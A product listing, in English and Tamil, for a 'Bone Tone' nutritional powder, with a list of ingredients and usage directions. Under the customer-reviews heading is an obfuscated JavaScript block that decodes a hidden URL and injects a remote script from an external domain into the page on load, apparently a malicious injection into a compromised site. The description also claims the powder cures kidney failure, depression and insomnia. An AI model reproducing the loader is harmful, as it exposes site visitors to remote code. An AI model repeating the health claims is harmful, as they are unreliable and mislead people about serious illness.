BONE TONE POWDER

QUANTITY : 1 kg

Was:450.00 Now:400.00

Product Description

Description

In today’s Modern World, people are not taking proper nutrients the body needs. Thus, most men and women over the age of 30 suffer from health problems such as bone loss, back pain, hip pain and arthritis. The main reason for this is the lack of calcium in the body. There are a few oils and medicines available in the market but these
will not give you a permanent solution.

FIT NATURA’s Naturally Made BONE TONE POWDER – contains calcium and many other nutrients. This will repair your bone and joint problems. It treats insomnia, kidney failure, digestive disorders & low blood density. It also helps to cure many major physical disorders such as depression and immunity.

Bamboo Rice – Strengthens the body and helps you to keep young forever. Stabilizes the bone and fixes the nerve

Ragi – Rich in protein, fiber, magnesium and calcium. It strengthens the body, relieves heat and improves the mental health

Green Gram – It contains more nutrients than the normal crop. Increases the body’s immunity. Gives body the energy it needs

Barley – Contains phosphorus and copper to stabilize the bones

Rajma – It is high in Potassium, iron, protein & fiber. Strengthens the bones in our body and prevents joint pain as well as recovers low bone density

Black Horse Gram – It is rich in calcium, protein, iron and phosphorus. It gives greater strength to the bone and nerves

Almonds – Contains Vitamin B2, Vitamin E, Potassium, Iron, Protein, Phosphorus, Calcium and Copper. Strengthens the hips and spine

Almond Pisin – The minerals contained in it are very good for skin and bones health. Increases immunity power.

Pumpkin Seed – It is rich in nutrients and vitamins. The mineral in it helps strengthen the bones and helps the body stay firm.

Brain – It is good for those who suffer from Spinal cord pain, neck pain. It increases the memory power & Strengthens the brain nerves.

Method of use: Mix 1 tbsp Bone Tone Powder with 1 glass of brewed milk. You can drink it twice a day after food. Drinking regularly for at least three months is a good thing.

Who can Drink? Everyone from two years old to adults can drink. Pregnant Women, Arthritis and Joint Pain Patients and also Those who wish to keep the body steady can always take it. Benefits can be obtained by following the following diet:

Diabetics patients – Eat more wheat related foods and barley rice.

Obesity patients – Eat plenty of vegetables and fruits

 

 

இன்றைய மார்டன் உலகில் உடலுக்கு தேவையான ஊட்ட்சத்துக்கள் நிறைந்த உணவை உண்பவர்கள் எண்ணிக்கை மிக குறைவே. இதனால் பெரும்பாலான 30 வயதுக்கு மேல் உள்ள
ஆண்கள் மற்றும் பெண்கள் எலும்பு தேய்மானம், முதுக்கு தண்டில் வலி, இடுப்பு வலி, மூட்டுவலி போன்ற உடல்நல குறைவால் அவதிப்படுகிறார்கள். இதற்கு முக்கிய காரணம் உடலில் கால்சியம் சத்து குறைவாக இருப்பதாகும். மார்கெட்டில் இதற்கென்று ஒரு சில எண்ணெய் மற்றும் மருந்துகள் கிடைக்கின்றன ஆனால் அவையெல்லாம் உங்களுக்கு நிரந்தர தீர்வு தராது.

FIT NATURA-வின் இயற்கை முறையில் தயாரிக்கப்பட்ட BONE TONE POWDER – இதில் கால்சியம் மற்றும் பல எண்ணற்ற சத்துக்கள் அடங்கியுள்ளன. இது உங்களுடைய எலும்பு மற்றும் மூட்டு சார்ந்த பிரட்சனைகளை சரி செய்யும். மேலும் தூக்கமின்மை, சிறுநீரக கோளாறு, செரிமான பிரட்சனை, இரத்த சோகை, நோய் எதிர்ப்பு சக்தி குறைவு என்று பல முக்கிய உடல் உபாதைகளை சீர் செய்ய உதவும்.

மூங்கில் அரிசி – உடலின் பலம் கூடும், எப்போதும் இளமையாக வைத்திருக்க உதவும். எலும்பை உறுதியாக்கும் மற்றும் நரம்பு தளர்ச்சியை சரி செய்யும்

நாட்டு ராகி – புரதம், நார்சத்து, மக்னிசியம், கால்சியம் நிறைந்தவை. இது உடலை உறுதி செய்து, வெப்பத்தை தணிக்கும் மேலும் மன நலத்தையும் மேம்படுத்தும்

முளை பயிர் – சாதாரண பயிரை விட இதில் ஊட்டச்சத்துக்கள் அதிகம். உடலின் நோய் எதிர்ப்பு சக்தியை அதிகரிக்கிறது. உடலுக்கு தேவையான எனர்ஜியை தருகிறது

பார்லி – இதில் இருக்கும் பாஸ்பரஸ் மற்றும் காப்பர் போன்றவை எலும்புகளின் வலிமையை உறுதியாக்குகிறது

ராஜ்மா – பொட்டாசியம், இரும்பு சத்து, புரோட்டீன், நார்சத்து அதிக அளவில் உள்ளன. நம் உடலில் உள்ள எலும்புகளை வலுப்படுத்தி மூட்டு வலி வராமலும் எலும்புகள் தேய்மானம் ஆகாமலும் தடுக்கிறது

கருப்பு கொள்ளு – கால்சியம், புரதம், இரும்பு மற்றும் பாஸ்பரஸ் அதிகம் உள்ள ஒரு பொருள் இது. எழும்புக்கும், நரம்புக்கும் அதிக வலுவை கொடுக்கக் கூடியது

பாதாம் – இதில் வைட்டமின் பி2, வைட்டமின் ஈ, பொட்டாசியம், இரும்பு சத்து, புரோட்டீன், பாஸ்பரஸ், கால்சியம் மற்றும் காப்பர் அதிகம் உள்ளது. இடுப்பு மற்றும் முதுகு தண்டை பலப்படுத்தும்

பாதாம் பிசின் – இதில் உள்ள தாதுக்கள் தோல் மற்றும் எலும்புகள் ஆரோக்கியத்திற்கு மிகவும் நல்லது. கர்ப்ப பையில் உள்ள நசுக்கள் நீங்கி உடல் வலுவடையும். நோய் எதிர்ப்பு திறனை
அதிகரிக்கும்

பூசணி விதை – ஏராளமான ஊட்டச்சத்துக்கள் மற்றும் வைட்டமின்கள் நிறைந்து உள்ளது. இதில் உள்ள மினரல் எலும்புகளை பலப்படுத்தும் மற்றும் உடல் உறுதியாக இருக்க
உதவும்.

பிரண்டை – முதுகு தண்டு வலி, கழுத்து வலியால் அவதிப்படுபவர்களுக்கு நல்ல பலன் தரும். ஞாபக சக்தியை அதிகரிக்கும். மூளை நரம்புகளை வலுப்படுத்தும்.

பயன்படுத்தும் முறை : 1 கிளாஸ் காய்ச்சிய பாலில் 1 ஸ்பூன் Bone Tone பவுடர் சேர்த்து கலந்து தினமும் இரண்டு வேளை சாப்பிட்டு பின் குடிக்கலாம். குறைந்தது மூன்று மாதம் தொடர்ந்து குடித்து வந்தால் நல்ல பலன் கிடைக்கும்.

யாருலாம் இதை குடிக்கலாம்: இரண்டு வயது குழந்தைகள் முதல் பெரியவர்கள் வரை அனைவரும் குடிக்கலாம். மேலும் கர்பமாக இருக்கும் பெண்கள், மூட்டு தேய்மானம் மற்றும் மூட்டு வலியால் அவதிப்படுபவர்கள், ஆஸ்த்மா பிரட்சனை, தூக்கமின்மையால்
அவதிப்படுவோர், ஐடி துறையில் வேலை செய்வோர், பளுதூக்கும் வேலை செய்வோர் மற்றும்
உடலை எப்போதும் சீராக வைத்திருக்க நினைப்பவர்கள் இதை தொடர்ந்து எடுத்துக்கொள்ளலாம்.

கீழே குறிப்பிட்ட அளவு உணவு முறையை பின்பற்றினால் இரடிப்பு நன்மை கிடைக்கும்:

நீரழிவு நோயாளிகள் – கோதுமையில் செய்த உணவை அதிக அளவில் சாப்பிட வேண்டும் மற்றும் பார்லி அரிசியை கஞ்சி வைத்து குடிக்கலாம்.

உடல் பருமன் நோயாளிகள் – நீர்சத்து நிறைந்த காய்கறிகள் மற்றும் பழங்கள் சாப்பிடலாம்

Customer Reviews
var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();